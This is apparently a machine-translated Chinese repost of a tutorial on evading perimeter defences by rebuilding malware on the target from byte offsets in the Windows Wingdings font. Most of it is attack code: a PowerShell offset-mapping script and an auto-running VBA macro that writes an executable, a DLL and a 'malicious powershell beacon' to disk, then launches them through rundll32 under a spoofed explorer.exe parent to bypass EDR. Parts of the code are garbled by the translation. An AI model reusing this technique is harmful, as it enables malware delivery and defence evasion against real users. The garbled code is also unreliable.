本文将详细解释如何使用Windows系统字体创建恶意软件。边肖觉得很实用,分享给大家参考。希望你看完这篇文章能有所收获。
00-1010在大多数情况下,一般的网络攻击需要分为以下三个步骤:
00-1010a)要执行的恶意代码
b)或
c)非恶意代码,因为Payload可以在第三步下载恶意组件。
00-1010
步骤
a)执行恶意组件。
b)或
c)下载恶意组件,然后执行。
1、 传递一个包含了Payload的文件,该文件需包含:
我想要的解决方案应该满足以下条件:
1.不要包含任何恶意代码(甚至不是恶意字节)来绕过边界保护。
2.不要下载任何恶意代码。
3.最后执行恶意代码。
使用目标主机中的字体自行生成恶意软件。
首先,我们需要找出每个版本的Windows操作系统都包含的一个组件,我发现了这个:
我比较了几个版本Windows的Wingdings字体,发现这个字体在每个版本都是一样的。
因此,我打算用这种字体来实现我的“小”目标。我该怎么办?方法大致如下:
1.在我们的主机上收集恶意软件的字节数据。
2.将恶意软件的第一个字节与Wingdings字体进行比较。
3.在字体中找到相同的字节后,记录它在文本文件中的位置。
4.重复这个过程,直到发现恶意软件中包含的所有字节,然后在文本文件中记录它们的位置。
5.我们的有效载荷将包含对应于每个字节的温丁斯字体位置。
6.在目标主机上,Payload将使用Wingdings字体的位置将其转换为字节数据并构建恶意组件。
以下是用于找出字节对应字体位置的PowerShell代码:
$ Font=' c : \ Windows \ Font \ winding . TTF ' $恶意软件=' c : \用户\管理员\图片\ 2。PNG ' $ Font array=Get-Content $ Font-encoding byte-readcount 0 $ Malware array=Get-Content $ Malware-encoding byte-readcount 0 $ offset array=@()foreach($ byteInMalware in $ Malware array){ $ index=0 foreach($ byteInFont in $ Font array){ if($ byteInMalware-eq $ byteInFont){ $ offset array=$ index break } $ index } } PowerShell代码将生成一个VBA代码,您可以将其插入到宏文件中。这段代码将生成一个包含字节位置信息的字节数组,它将负责构建您的恶意组件:
$ i=0 $有效负载=' ' $ j=0 $ u=1 $ PayDef=' ' foreach($ offset in $ offset aray){ n
bsp;if($i -eq 30) { $payload = $payload + ", " +$offset + " _`r`n" $i=0 $j++ } else { if($i -eq 0) { $payload = $payload + $offset } else { $payload = $payload + ", " +$offset } } if($j -eq 25) { $payDef = $payDef + "`r`nFunctionccc$u()tt$u= Array($payload)ccc$u= tt$uEndFunction" $payload = "" $u++ $j = 0 } $i++}if($payload-ne ""){$payDef= $payDef + "`r`nFunction ccc$u()tt$u= Array($payload)ccc$u= tt$uEndFunction"} $payDef
运行结果如下:
下面给出的VBA代码将使用我们之前所创建的字节数组来生成恶意组件。接下来,我们需要选择Explorer.exe来作为RunDll32.exe的父进程(目的是绕过EDR产品),然后通过RunDll32.exe来执行我们的恶意组件。如果你不想把文件写入磁盘的话,你可以尝试结合内存注入技术来使用。
VBA代码如下:
[...]--> you array of bytes containing the position of necessary bytes in theWindings font. 'exampleto join the bytes for the fist malicious component t1 = cc1 t2 = cc2 t3 = cc3 t4 = cc4 t5 = cc5 t6 = cc6 t7 = cc7 t8 = cc8 t9 = cc9 t10 = cc10 t11 = cc11 t12 = cc12 t13 = cc13 t14 = cc14 t15 = cc15 t16 = cc16 t17 = cc17 t18 = cc18 ttt = Split(Join(t1, ",") &"," & Join(t2, ",") & "," & Join(t3,",") & "," & Join(t4, ",") &"," & Join(t5, ",") & "," & Join(t6,",") & "," & Join(t7, ",") &"," & Join(t8, ",") & "," & Join(t9,",") _ & "," & Join(t10,",") & "," & Join(t11, ",") &"," & Join(t12, ",") & "," &Join(t13, ",") & "," & Join(t14, ",")& "," & Join(t15, ",") & "," &Join(t16, ",") & "," & Join(t17, ",")& "," & Join(t18, ","), ",") [...] Dim nb As Integer Dim nb2 As Integer nb = UBound(ttt) - LBound(ttt) + 1 'ttt isa joined byte array nb2 = UBound(tt) - LBound(tt) + 1 nb3 = UBound(ttttttt) - LBound(ttttttt) + 1 Dim intFileNumber As Integer Dim i As Integer Dim j As Integer Dim lngFileSize As Long Dim lngFileSize2 As Long Dim strBuffer As String Dim strBuffer2 As String Dim lngCharNumber As Long Dim lngCharNumber2 As Long Dim strCharacter As String * 1 Dim strCharacter2 As String * 1 Dim strFileName As String Dim strFileName2 As String Dim offset() As Variant strFileName ="C:\Windows\Fonts\wingding.ttf" intFileNumber = FreeFile Open strFileName For Binary Access ReadShared As #intFileNumber lngFileSize = LOF(intFileNumber) strBuffer = Space$(lngFileSize) Get #intFileNumber, , strBuffer Close #intFileNumber Dim nFileNum As Long Dim sFilename As String Dim ind As Long sFilename2 ="C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary thatwill be use to select the parent of rundll32 sFilename ="C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will runpowershell beacon from an image sFilename3 ="C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beaconregistered in an .ICO nFileNum = FreeFile ' a loop would be better ;-) Open sFilename2 For Binary Lock Read WriteAs #nFileNum For lngCharNumber = 0 To nb - 1 ind = lngCharNumber + 1 off = ttt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum nFileNum = FreeFile Open sFilename For Binary Lock Read Write As#nFileNum For lngCharNumber = 0 To nb2 - 1 ind = lngCharNumber + 1 off = tt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum nFileNum = FreeFile Open sFilename3 For Binary Lock Read WriteAs #nFileNum For lngCharNumber = 0 To nb3 - 1 ind = lngCharNumber + 1 off = ttttttt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum rrEndSub Subrr() Dim xx As String Dim oihfasf As Object, eopuf As Object, kdjAs Object Dim oDic As Object, a() As Variant Dim pskaf As Integer Set oDic =CreateObject("Scripting.Dictionary") xx = "." Set oihfasf =GetObject("winmgmts:\\" _ & xx & "\root\CIMV2") Set eopuf = oihfasf.ExecQuery _ ("Select Name, ProcessID FROMWin32_Process", , 48) For Each kdj In eopuf If(kdj.Properties_("Name").Value) = "explorer.exe" Then pskaf =(kdj.Properties_("ProcessID").Value) End If NextDim tAs Date Dimcnt As LongDimarr(2) As Byte Dimxl As Stringxl ="C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exeC:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -fC:\Users\Public\Documents\BEACON.ico"" " & pskafxx ="."Setow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")Setos = ow.Get("Win32_ProcessStartup")Setoc = os.SpawnInstance_Setop = GetObject("winmgmts:\\" & xx &"\root\cimv2:Win32_Process")op.Createxl, Null, oc, aslh EndSubSubAutoOpen() ccEndSubSubWorkbook_Open() ccEndSub
关于“如何利用Windows系统字体来创建恶意软件”这篇文章就分享到这里了,希望
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/102228.html